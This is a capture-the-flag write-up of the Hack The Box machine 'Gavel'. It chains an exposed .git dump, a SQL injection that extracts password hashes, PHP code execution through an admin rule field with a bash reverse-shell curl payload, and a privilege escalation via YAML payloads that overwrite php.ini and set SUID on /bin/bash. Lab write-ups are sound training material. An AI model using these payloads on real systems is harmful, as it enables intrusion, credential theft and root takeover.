Gavel

Writeup of Gavel machine

Join The Best Hacking Community Worldwide | Hack The BoxHack The Box

Recon

We've two open ports 80 and 22.

I checked up port 80 http and started running dirsearch.

http://gavel.htb/login.php endpoint shows a login page. So, I checked its sources, written version numbers, etc. During this time, dirsearch dumped out quite useful info

┌──(zwique㉿zwique)-[~/Downloads]
└─$ dirsearch -u http://gavel.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                 
 (_||| _) (/_(_|| (_| )                                                                                                          
                                                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/zwique/Downloads/reports/http_gavel.htb/_25-12-02_16-17-04.txt

Target: http://gavel.htb/

[16:17:04] Starting:                                                                                                             
[16:17:13] 301 -  305B  - /.git  ->  http://gavel.htb/.git/                 
[16:17:13] 200 -  407B  - /.git/branches/                                   
[16:17:13] 200 -    3B  - /.git/COMMIT_EDITMSG
[16:17:13] 200 -  616B  - /.git/                                            
[16:17:13] 200 -   23B  - /.git/HEAD
[16:17:13] 200 -  136B  - /.git/config                                      
[16:17:13] 200 -   73B  - /.git/description
[16:17:13] 200 -  454B  - /.git/info/                                       
[16:17:13] 200 -  240B  - /.git/info/exclude
[16:17:13] 200 -  486B  - /.git/logs/
[16:17:14] 200 -  670B  - /.git/hooks/                                      
[16:17:14] 200 -  422B  - /.git/logs/HEAD
[16:17:14] 301 -  315B  - /.git/logs/refs  ->  http://gavel.htb/.git/logs/refs/
[16:17:14] 200 -  422B  - /.git/logs/refs/heads/master
[16:17:14] 301 -  321B  - /.git/logs/refs/heads  ->  http://gavel.htb/.git/logs/refs/heads/
[16:17:14] 301 -  316B  - /.git/refs/heads  ->  http://gavel.htb/.git/refs/heads/
[16:17:14] 301 -  315B  - /.git/refs/tags  ->  http://gavel.htb/.git/refs/tags/
[16:17:14] 200 -   41B  - /.git/refs/heads/master                           
[16:17:14] 200 -  467B  - /.git/refs/                                       
[16:17:14] 200 -  219KB - /.git/index                                       
[16:17:15] 403 -  274B  - /.ht_wsr.txt                                      
[16:17:15] 403 -  274B  - /.htaccess.bak1                                   
[16:17:15] 403 -  274B  - /.htaccess.orig
[16:17:15] 403 -  274B  - /.htaccess.sample
[16:17:15] 403 -  274B  - /.htaccess.save
[16:17:15] 403 -  274B  - /.htaccess_extra
[16:17:15] 403 -  274B  - /.htaccess_orig                                   
[16:17:15] 403 -  274B  - /.htaccess_sc                                     
[16:17:15] 403 -  274B  - /.htaccessOLD2                                    
[16:17:15] 403 -  274B  - /.htaccessBAK                                     
[16:17:15] 403 -  274B  - /.htm                                             
[16:17:15] 403 -  274B  - /.htaccessOLD
[16:17:15] 403 -  274B  - /.html                                            
[16:17:15] 403 -  274B  - /.httr-oauth                                      
[16:17:15] 403 -  274B  - /.htpasswd_test
[16:17:15] 403 -  274B  - /.htpasswds
[16:17:15] 200 -    2KB - /.git/objects/                                    
[16:17:18] 403 -  274B  - /.php                                             
[16:17:31] 302 -    0B  - /admin.php  ->  index.php                         
[16:17:48] 301 -  307B  - /assets  ->  http://gavel.htb/assets/             
[16:17:48] 200 -  515B  - /assets/                                          
[16:18:14] 301 -  309B  - /includes  ->  http://gavel.htb/includes/         
[16:18:14] 403 -  274B  - /includes/
[16:18:14] 200 -    3KB - /index.php                                        
[16:18:14] 200 -    3KB - /index.php/login/                                 
[16:18:20] 200 -    1KB - /login.php                                        
[16:18:20] 302 -    0B  - /logout.php  ->  index.php                        
[16:18:37] 200 -    1KB - /register.php                                     
[16:18:40] 403 -  274B  - /server-status                                    
[16:18:40] 403 -  274B  - /server-status/                                   
                                                                             
Task Completed 

There is a .git endpoint alive in gavel.htb. So, I immediately used git-dumper to dump everything out.

git-dumper http://gavel.htb web

The super cool thing I've found is the back-end source code of Inventory page -> inventory.php

8KB

inventory.php

Open

SQL Injection

The page allows sorting the inventory using a sort parameter taken from GET/POST:

$sortItem = $_POST['sort'] ?? $_GET['sort'] ?? 'item_name';
$col = "`" . str_replace("`", "", $sortItem) . "`";

This value is then inserted directly into the SQL query as a column name:

$stmt = $pdo->prepare("SELECT $col FROM inventory WHERE user_id = ? ORDER BY item_name ASC");

Even though backticks are stripped, the application does not validate that $sortItem is a real, safe column. Since PDO cannot parameterize column names, the user‑controlled value becomes raw SQL inside the query. This leads to SQL Injection in the SELECT clause, allowing an attacker to inject additional expressions or subqueries by passing crafted sort values.

Building Up Payload on the inventory.php

The first I've done is registering a new user account for myself and logged in.

1. Injection Point

$sortItem = $_GET['sort']
$col = "`" . str_replace("`", "", $sortItem) . "`";
$stmt = $pdo->prepare("SELECT $col FROM inventory WHERE user_id = ? ORDER BY item_name ASC");

$col is placed directly into the SELECT clause, so anything that isn’t a valid column will break the query and allow injection.

1. Notice that user_id is also echoed into the query

$userId = $_GET['user_id'];
$stmt->execute([$userId]);

Since user_id is used as a number, but inserted separately, you can break before the parameter with:

user_id=x`

The backtick closes the column wrapper and lets us inject SQL.

3. Extend the SELECT clause

After closing the backtick, you append:

+FROM+(SELECT CONCAT(username,0x3a,password) AS `x` FROM users)y

This turns the original expected:

SELECT `item_name` FROM inventory ...

into:

SELECT x FROM (SELECT CONCAT(username,':',password) AS x FROM users) y

4. Comment out the rest

To prevent syntax errors from the trailing query, add:

;-- -

5. Neutralize the sort parameter

The sort parameter becomes irrelevant, but the backend still wraps it in backticks. Using something harmless:

sort=?;-- -

Final Payload

GET /inventory.php?user_id=x`+FROM+(SELECT+CONCAT(username,0x3a,password)+AS+`'x`+from+users)y;--+-&sort=\?;--+-%00

Credits to 0xanan who found the complete payload

This payload successfully dumps out all the passwords of registered users. The first hash is the admin's password. Cracked as midnight1

auctioneer:$2y$10$MNkDHV6g16FjW/lAQRpLiuQXN4MVkdMuILn0pLQlC2So9SgH5RTfS:midnight1

RCE from admin's account

1. Understanding admin panel

admin.php

<input type="text" class="form-control form-control-user" name="rule" placeholder="Edit rule">
<input type="text" class="form-control form-control-user" name="message" placeholder="Edit message">

• You noticed that the rule field is editable by the admin.

• Rules are probably evaluated by the backend to check whether a bid is valid.

• Comments in the HTML hinted at PHP code examples, e.g.

<!-- <code lang="php">return $current_bid % 5 == 0;</code> -->

This tells you:

• The backend likely executes $rule as PHP.

• Whatever you put in rule is evaluated server-side.

2. Confirming Where the Rule Executes

You checked other pages for signs of rule execution.

In bidding.php, each auction card shows:

<form ... method="POST">
    <input type="hidden" name="auction_id" value="46">
    <input type="number" name="bid_amount">
</form>

The JavaScript sends these forms to:

/includes/bid_handler.php

This meant: When a bid is placed, the backend loads the rule for that auction and evaluates it.

So the flow is:

admin.php (store rule) → bid_handler.php (execute rule)

This confirmed the RCE path.

Testing RCE

To verify that the PHP code execution vulnerability actually works, I first injected a simple test payload using the admin interface. Instead of immediately spawning a reverse shell, I used a harmless command (id) to confirm code execution.

1. Injecting the malicious rule

curl -X POST "http://gavel.htb/admin.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: gavel_session=YOUR_SESSION" \
  -d "auction_id=YOUR_ID&rule=system('id');%20return%20true;&message=test"

1. Triggering the rule via a bid

curl -X POST "http://gavel.htb/includes/bid_handler.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: gavel_session=YOUR_SESSION" \
  -d "auction_id=YOUR_ID&bid_amount=999359666"

Replace YOUR_SESSION and YOUR_ID parts by your own values.

since auction_id always changes in specific period of time, get your own auction_id from admin.php

change your auction_id if it says

{"success":false,"message":"Auction has ended."} 

If it's showing insufficient balance, try lowering the value of bid_amount or restart the machine.

User Flag

curl -X POST "http://gavel.htb/admin.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: gavel_session=YOUR_SESSION" \
  -d "auction_id=YOUR_ID&rule=system('bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/PORT%200%3E%261%22');%20return%20true;&message=reverse"

curl -X POST "http://gavel.htb/includes/bid_handler.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: gavel_session=YOUR_SESSION" \
  -d "auction_id=YOUR_BID&bid_amount=50000"

bash-5.1$ cd /home
bash-5.1$ ls
auctioneer
bash-5.1$ su auctioneer
Password: 
auctioneer@gavel:/home$ whoami
auctioneer
auctioneer@gavel:/home$ cd auctioneer/
auctioneer@gavel:~$ cat user.txt 
cf5816f59df237d8bfa525d744760e89

Step-by-Step Privilege Escalation Guide

Output of linpeas.sh

135KB

linpeas.txt

Open

Key Findings in LinPEAS Output

A. Interesting Services Running as Root

auction_watcher.service            loaded active running Auction watcher every second
gaveld.service                     loaded active running Gavel Root Daemon
timeout_gavel.service              loaded active running Apache bid_handler killer

B. Critical Discovery - Writable PHP Config

-rw-r--r-- 1 root root 61 Dec  2 05:39 /opt/gavel/.config/php/php.ini

This PHP configuration file is world-readable and potentially writable. Let's check its contents and permissions.

C. Running Processes of Interest

root         936  0.0  0.0   7372  3508 ?        Ss   04:07   0:04 /bin/bash /root/scripts/auction_watcher.sh
root         957  0.4  0.4  27808 18800 ?        Ss   04:07   0:40 python3 /root/scripts/timeout_gavel.py

These are root-owned scripts running continuously.

D. Critical Discovery: Gavel Utility

Found a custom binary:

auctioneer@gavel:~$ /usr/local/bin/gavel-util
Usage: /usr/local/bin/gavel-util <cmd> [options]
Commands:
  submit <file>           Submit new items (YAML format)
  stats                   Show Auction stats
  invoice                 Request invoice
auctioneer@gavel:~$ 

Root

Payload 1

name: IniOverwrite
description: Removing restrictions
image: "data:image/png;base64,AA=="
price: 1337
rule_msg: "Config Pwned"
rule: |
  file_put_contents('/opt/gavel/.config/php/php.ini', "engine=On\ndisplay_errors=On\nopen_basedir=/\ndisable_functions=\n");
  return false;

Previous

Changing the permission of /opt/gavel/.config/php/php.ini

auctioneer@gavel:~$ cat /opt/gavel/.config/php/php.ini
engine=On
display_errors=On
open_basedir=/
disable_functions=
auctioneer@gavel:~$ 

After

1. Overwrites the PHP config file

2. Enables PHP engine (engine=On)

3. Shows errors for debugging (display_errors=On)

4. ⚠️ Removes directory restrictions (open_basedir=/) - PHP can now access ANY file

5. ⚠️ Enables ALL dangerous functions (disable_functions= empty) - can run shell commands

Payload 2

name: RootSuid
description: Getting Root
image: "data:image/png;base64,AA=="
price: 1337
rule_msg: "Shell Pwned"
rule: |
  system("chmod u+s /bin/bash");
  return false;

1. Uses system() (now enabled by Payload 1) to run shell commands

2. Sets SUID bit on /bin/bash (chmod u+s)

3. Makes bash run as root for any user

4. After this runs: /bin/bash -p gives you root shell

Payload 1

/usr/local/bin/gavel-util submit ini_overwrite.yaml

Payload 2

This command submits a malicious YAML file to an auction system that will execute the embedded PHP code with elevated privileges.

The Attack Chain:

1. Payload 1 executes → Removes PHP security

2. PHP can now → Run any command, access any file

3. Payload 2 executes → Makes bash always run as root

4. You run → /bin/bash -p → You get root!

The End!!! ​ ​ Thank you!!! ​

Owned Gavel from Hack The Box!labs.hackthebox.com